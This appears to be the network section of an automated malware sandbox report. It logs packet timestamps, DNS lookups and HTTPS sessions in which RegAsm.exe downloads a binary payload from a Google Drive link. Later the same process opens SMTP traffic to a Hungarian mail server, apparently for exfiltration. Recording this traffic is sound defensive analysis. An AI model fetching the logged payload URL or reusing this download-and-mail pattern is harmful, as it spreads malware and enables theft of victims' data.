                                Oct 13, 2021 16:54:49.970972061 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.971132994 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.971169949 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.971355915 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.971457958 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.971494913 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.971503973 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.971643925 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.971791029 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.971941948 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.971976042 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.972137928 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.972168922 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.972304106 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.972412109 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.972445965 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.972470999 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.972587109 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.972750902 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.972913980 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.972945929 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.973102093 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.973136902 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.973342896 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.973352909 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.973383904 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.973469973 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.973570108 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.973603964 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.973758936 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.973799944 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.974013090 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.974049091 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.974200964 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.974231958 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.974380016 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.974414110 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.974581957 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.974651098 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.974682093 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.974730015 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.974828959 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.974859953 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.975081921 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.975119114 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.975289106 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.975323915 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.975492954 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.975613117 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.975647926 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.975657940 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.975863934 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.975929022 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.975963116 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.976099968 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.976186991 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.976260900 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.976295948 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.976378918 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.976557970 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.976722002 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.976741076 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.976763964 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.976926088 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.976959944 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.977107048 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.977142096 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.977297068 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.977333069 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.977576971 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.977606058 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.977755070 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.977786064 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.977945089 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.977982998 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.978158951 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.978214979 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.978245974 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.978312016 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.978394032 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.978424072 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.978584051 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.978615999 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.978853941 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.978884935 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.979032040 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.979052067 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.979074955 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.979223013 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.979258060 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.979491949 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.979525089 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.979671001 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.979701996 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.979861975 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.979892015 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.979916096 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.980135918 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.980165958 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.980310917 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.980340958 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.980490923 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.980525017 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.980724096 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.980777025 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.980807066 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.980878115 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.980957985 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.980984926 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.981239080 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.981275082 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.981439114 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.981463909 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.981494904 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.981589079 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.981723070 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.981758118 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.981913090 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.981945992 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.982106924 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.982192039 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.982220888 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.982326031 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.982444048 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.982496023 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.982585907 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.982595921 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.982621908 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.982683897 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.982780933 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.982856035 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.982883930 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.982935905 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.983010054 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.983095884 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.983180046 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.983190060 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.983211040 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.983236074 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.983376980 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.983477116 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.983495951 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.983517885 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.983556986 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.983658075 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.983670950 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.983684063 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.983714104 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.983863115 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.983870029 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.983891964 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.984016895 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.984034061 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.984050035 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.984148026 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.984241962 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.984266996 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.984313965 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.984484911 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.984503031 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.984529018 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.984620094 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.984637022 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.984704971 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.984715939 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.984882116 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.984951019 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.984973907 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:56:24.915260077 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:56:24.933888912 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:24.934210062 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:56:24.990811110 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:24.991367102 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:56:25.010266066 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:25.010556936 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:56:25.030911922 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:25.034163952 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:56:25.057996035 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:25.058058977 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:25.058106899 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:25.058140039 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:25.058399916 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:56:25.059344053 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:25.062593937 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:56:25.081564903 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:25.132746935 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:56:25.190913916 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:56:25.209732056 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:25.210824013 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:56:25.229943991 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:25.230798006 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:56:25.252981901 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:25.253602982 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:56:25.272201061 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:25.272631884 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:56:25.331181049 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:25.408674002 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:25.409028053 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:56:25.427741051 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:25.476439953 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:56:25.483460903 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:56:25.483649015 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:56:25.483659983 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:56:25.483757973 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:56:25.502002954 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:25.502029896 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:25.502216101 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:25.502232075 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:26.753557920 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:56:26.804239988 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:57:26.825421095 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:57:26.825679064 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:58:04.806286097 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:58:04.826661110 CEST58749776185.111.89.226192.168.11.20
                                Oct 13, 2021 16:58:04.826908112 CEST49776587192.168.11.20185.111.89.226
                                Oct 13, 2021 16:58:04.827227116 CEST49776587192.168.11.20185.111.89.226

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 13, 2021 16:54:48.979005098 CEST4961353192.168.11.201.1.1.1
                                Oct 13, 2021 16:54:49.000648022 CEST53496131.1.1.1192.168.11.20
                                Oct 13, 2021 16:54:49.637078047 CEST4985653192.168.11.201.1.1.1
                                Oct 13, 2021 16:54:49.668607950 CEST53498561.1.1.1192.168.11.20
                                Oct 13, 2021 16:56:24.772185087 CEST6030953192.168.11.201.1.1.1
                                Oct 13, 2021 16:56:24.854649067 CEST53603091.1.1.1192.168.11.20

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Oct 13, 2021 16:54:48.979005098 CEST192.168.11.201.1.1.10x9b5cStandard query (0)drive.google.comA (IP address)IN (0x0001)
                                Oct 13, 2021 16:54:49.637078047 CEST192.168.11.201.1.1.10x8192Standard query (0)doc-14-9g-docs.googleusercontent.comA (IP address)IN (0x0001)
                                Oct 13, 2021 16:56:24.772185087 CEST192.168.11.201.1.1.10x5c57Standard query (0)mail.csavarcsapagyexpress.huA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Oct 13, 2021 16:54:49.000648022 CEST1.1.1.1192.168.11.200x9b5cNo error (0)drive.google.com172.217.168.46A (IP address)IN (0x0001)
                                Oct 13, 2021 16:54:49.668607950 CEST1.1.1.1192.168.11.200x8192No error (0)doc-14-9g-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                Oct 13, 2021 16:54:49.668607950 CEST1.1.1.1192.168.11.200x8192No error (0)googlehosted.l.googleusercontent.com172.217.18.97A (IP address)IN (0x0001)
                                Oct 13, 2021 16:56:24.854649067 CEST1.1.1.1192.168.11.200x5c57No error (0)mail.csavarcsapagyexpress.hucsavarcsapagyexpress.huCNAME (Canonical name)IN (0x0001)
                                Oct 13, 2021 16:56:24.854649067 CEST1.1.1.1192.168.11.200x5c57No error (0)csavarcsapagyexpress.hu185.111.89.226A (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • drive.google.com
                                • doc-14-9g-docs.googleusercontent.com

                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.11.2049773172.217.168.46443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampkBytes transferredDirectionData
                                2021-10-13 14:54:49 UTC0OUTGET /uc?export=download&id=1JlaiCuMNy0PV111dLbQNpRN9dpE5oBkc HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Host: drive.google.com
                                Cache-Control: no-cache
                                2021-10-13 14:54:49 UTC0INHTTP/1.1 302 Moved Temporarily
                                Content-Type: text/html; charset=UTF-8
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Wed, 13 Oct 2021 14:54:49 GMT
                                Location: https://doc-14-9g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0l7hc8l5m01jjthf5v4et0b93qf3oibd/1634136825000/12448148553778765603/*/1JlaiCuMNy0PV111dLbQNpRN9dpE5oBkc?e=download
                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                Content-Security-Policy: script-src 'nonce-aKqu6K43qgCdt6qTsYcKCQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                X-Content-Type-Options: nosniff
                                X-Frame-Options: SAMEORIGIN
                                X-XSS-Protection: 1; mode=block
                                Server: GSE
                                Set-Cookie: NID=511=RzggtChFEwz8Bg2zQD9KHprjPCzAIt9-raIb-EcQrBssj8iSmTtPU5Dt1AQuQTdatV6zmYnXbRFecCJmSf90omXxj1lZ2HWrFOM2UCYSoy3F3qFYppY8_2AQiFqHO_cxiqzVD5uZ5-_on9C1bLU9I2v58J03wyVNPHqHT-c8DpQ; expires=Thu, 14-Apr-2022 14:54:49 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                Accept-Ranges: none
                                Vary: Accept-Encoding
                                Connection: close
                                Transfer-Encoding: chunked
                                2021-10-13 14:54:49 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 31 34 2d 39 67 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 30 6c 37 68
                                Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-14-9g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0l7h
                                2021-10-13 14:54:49 UTC1INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.11.2049774172.217.18.97443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampkBytes transferredDirectionData
                                2021-10-13 14:54:49 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0l7hc8l5m01jjthf5v4et0b93qf3oibd/1634136825000/12448148553778765603/*/1JlaiCuMNy0PV111dLbQNpRN9dpE5oBkc?e=download HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Cache-Control: no-cache
                                Host: doc-14-9g-docs.googleusercontent.com
                                Connection: Keep-Alive
                                2021-10-13 14:54:49 UTC2INHTTP/1.1 200 OK
                                X-GUploader-UploadID: ADPycdsMVoXaj5dKG1jhWV6IOztPh-s9Ihy5dRVDa-M8ANKE1txl4wvBChv66gMfI68juvyAdKeJPuoDVajqZaC-LR0
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Credentials: false
                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                Access-Control-Allow-Methods: GET,OPTIONS
                                Content-Type: application/octet-stream
                                Content-Disposition: attachment;filename="tailor_mABTPEq71.bin";filename*=UTF-8''tailor_mABTPEq71.bin
                                Content-Length: 221760
                                Date: Wed, 13 Oct 2021 14:54:49 GMT
                                Expires: Wed, 13 Oct 2021 14:54:49 GMT
                                Cache-Control: private, max-age=0
                                X-Goog-Hash: crc32c=Lq8MVw==
                                Server: UploadServer
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                Connection: close
